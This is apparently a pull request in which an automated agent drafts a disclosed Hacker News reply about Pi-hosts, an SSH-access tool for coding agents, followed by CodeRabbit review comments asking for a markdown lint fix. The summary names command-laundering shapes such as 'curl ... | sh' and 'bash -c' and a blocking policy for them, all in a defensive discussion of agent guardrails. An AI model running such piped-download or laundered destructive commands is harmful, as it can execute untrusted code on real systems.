[claude-hackernews] Reply draft: Pi-hosts Show HN, args-level laundering vs verb-tier classification (id=47943466)

[NiveditJain]

Summary

• Draft reply on Show HN: Pi-hosts -- Give the Pi coding agent access to your servers (https://news.ycombinator.com/item?id=47943466).
• Adjacent-product Show HN; OP describes a tiered command-risk + approval-mode policy (4 risk tiers x 5 modes). Substantive engagement: verb-classification leaves a gap for laundered destructive ops (bash -c '...', sh -lc, curl ... | sh, apt-get install postinst).
• One FailProof anchor: block-curl-pipe-sh as the args-level companion to a name-classifier. Disclosure line at top, ASCII-only punctuation, ~135 words.

Discovery path (browser-driven, no API mirrors)

• /ask, /show, /news scanned via browser_get_html on table#hnmain.
• hn.algolia.com search rotated across queries: claude code deleted, agent guardrails, claude code rm -rf, agent destroyed, agent sandbox, tool call policy, Show HN agent, Show HN MCP, Show HN policy, coding agent, claude code, accidentally deleted, AI agent deleted database. Most hits already covered or off-topic.
• Pi-hosts surfaced via the Show HN policy query; verified uncovered against drafts/, comments/, and the open-PR diff scan.

Three-surface duplicate check (item?id=47943466)

• grep -rl "item?id=47943466" drafts/ comments/ -> no hits.
• gh pr list --state all cross-diff scan -> no hits across all 47 prior PRs.

Thread-fit notes

• Falls in the Show HN of an adjacent product where the OP solicits design discussion lane (INSTRUCTIONS), not the concrete-failure-post lane.
• Reply form rendered (not closed). Thread is stale (5 days, 0 comments) but the OP is the realistic audience for a small Show HN; substantive peer engagement is high-value to a solo author.
• Pi-hosts and FailProof are stack-adjacent: Pi-hosts gates SSH-out on the host side; FailProof gates the local agent's tool calls before any of those host_exec invocations happen. The reply makes the design-contrast cleanly without claiming overlap.

Brand-voice / anti-pitch checks

• Disclosure line at top in the prescribed (disclosure: I work on FailProof AI: <repo URL>) form.
• One paragraph of substantive on-topic content (verb-classification gap, command laundering examples) that stands on its own with the FailProof mention removed.
• ONE policy named (block-curl-pipe-sh), tied directly to the laundering-shape gap. No comma-list of policies. No snippet (so the one OR the other rule is satisfied).
• No install command, no scope-merge / 39-policies / ~/.failproofai/ talk, no two-link pattern (disclosure URL only), no dashboard plug, no marketing connectives.
• ASCII-only punctuation: hyphens, three-dot ellipses, straight quotes; letter x not ×.

Test plan

• Review the draft body against INSTRUCTIONS.md "Tone for discussing it on HN" and the working-example anchor (comments/2026-04-29T043958Z.md).
• If happy: paste the body into the textarea on https://news.ycombinator.com/item?id=47943466 from the chosen account, click add comment, copy the resulting comment permalink.
• If posted: ask the agent to append the comment permalink to the HN: line and re-commit, then merge this PR (merge = "I posted it").
• If rejecting: close this PR without merging; the draft becomes a record of the considered-and-skipped attempt.

Draft file: drafts/2026-05-04T051522Z.md

Summary by CodeRabbit

• Documentation
  • Added draft post examining SSH access security for AI coding agents, covering risk-assessment methodologies, security approach analysis, system integration patterns, and implementation findings including validation constraints and best practices.

[coderabbitai]

📝 Walkthrough

Walkthrough

A new draft markdown file is added to document a Hacker News post about pi-hosts, an SSH access extension for AI coding agents. The draft includes the HN link, a proposed comment on risk-classification approaches, an integration insight for the FailProof team, and development notes.

Changes

Draft HN Post: pi-hosts Response

Layer / File(s)	Summary
HN Post Introduction drafts/2026-05-04T051522Z.md (lines 1–15)	HN link, OP/story summary of pi-hosts with installation and default modes ("balanced" vs "paranoid").
Proposed Comment drafts/2026-05-04T051522Z.md (lines 16–23)	Top-level reply critiquing verb-based risk classification and proposing args-shape inspection via block-curl-pipe-sh pattern.
Team Integration Insight drafts/2026-05-04T051522Z.md (lines 24–27)	Mapping of how Pi-hosts and FailProof complement each other (SSH-out gating vs local tool-call blocking) and ecosystem alignment around risk taxonomies.
Development Notes drafts/2026-05-04T051522Z.md (lines 28–35)	Findings on thread age, matrix accuracy, punctuation constraints, forbidden patterns, body length, and draft status.

Estimated Code Review Effort

🎯 1 (Trivial) | ⏱️ ~3 minutes

Possibly Related PRs

• [claude-hackernews] Switch HN automation to drafts-only mode #2: Introduces drafts-only workflow and commits drafts/ directory, directly enabling this PR's new draft file.
• [claude-hackernews] Restore drafts/ vs comments/ split: route writes to drafts/ #6: Restores drafts/ infrastructure and write-target that this PR depends on.
• [claude-hackernews] Reconcile drafts/ vs comments/ split; add cron no-op alert #4: Relates to drafts/ vs comments/ workflow transition and directory structure changes.

Poem

A rabbit hops through pi-host trees,
SSH doors swing open with ease,
FailProof's walls and the hosts align,
Safe gateways built on risk design! 🐰✨
New drafts take shape, ideas take flight,
Thoughts on the HN stage, burning bright.

🚥 Pre-merge checks | ✅ 5

✅ Passed checks (5 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title directly and specifically describes the main change: adding a reply draft about Pi-hosts with focus on args-level security analysis vs verb classification, including the HN item ID.
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.
Linked Issues check	✅ Passed	Check skipped because no linked issues were found for this pull request.
Out of Scope Changes check	✅ Passed	Check skipped because no linked issues were found for this pull request.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

---

_{Review rate limit: 3/5 reviews remaining, refill in 16 minutes and 54 seconds.}

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[coderabbitai]

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@drafts/2026-05-04T051522Z.md`:
- Around line 18-22: The fenced code block opened with triple backticks (```)
triggers markdownlint MD040 because it lacks a language tag; update that opening
fence to include a language (e.g., change ``` to ```text) so the block reads
```text ... ``` and the linter no longer flags MD040, ensuring the block content
(the paragraph mentioning "FailProof AI" and "block-curl-pipe-sh") remains
unchanged.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

• Push a commit to this branch (recommended)
• Create a new PR with the fixes

---

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

Run ID: 4673bc46-5454-4a5c-a9b5-5c855a941d36

📥 Commits

Reviewing files that changed from the base of the PR and between ebbce06 and faa12bc.

📒 Files selected for processing (1)

• drafts/2026-05-04T051522Z.md

[coderabbitai]

⚠️ Potential issue | 🟡 Minor | ⚡ Quick win

Add a language tag to the fenced block to satisfy markdownlint.

Line 18 opens a fenced code block without a language, which triggers MD040. Use an explicit language (for example text) to keep lint clean.

Suggested patch

-```
+```text
 (disclosure: I work on FailProof AI: https://github.com/exospherehost/failproofai)
@@
-```
+```

🧰 Tools

🪛 markdownlint-cli2 (0.22.1)

[warning] 18-18: Fenced code blocks should have a language specified

(MD040, fenced-code-language)

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@drafts/2026-05-04T051522Z.md` around lines 18 - 22, The fenced code block
opened with triple backticks (```) triggers markdownlint MD040 because it lacks
a language tag; update that opening fence to include a language (e.g., change
``` to ```text) so the block reads ```text ... ``` and the linter no longer
flags MD040, ensuring the block content (the paragraph mentioning "FailProof AI"
and "block-curl-pipe-sh") remains unchanged.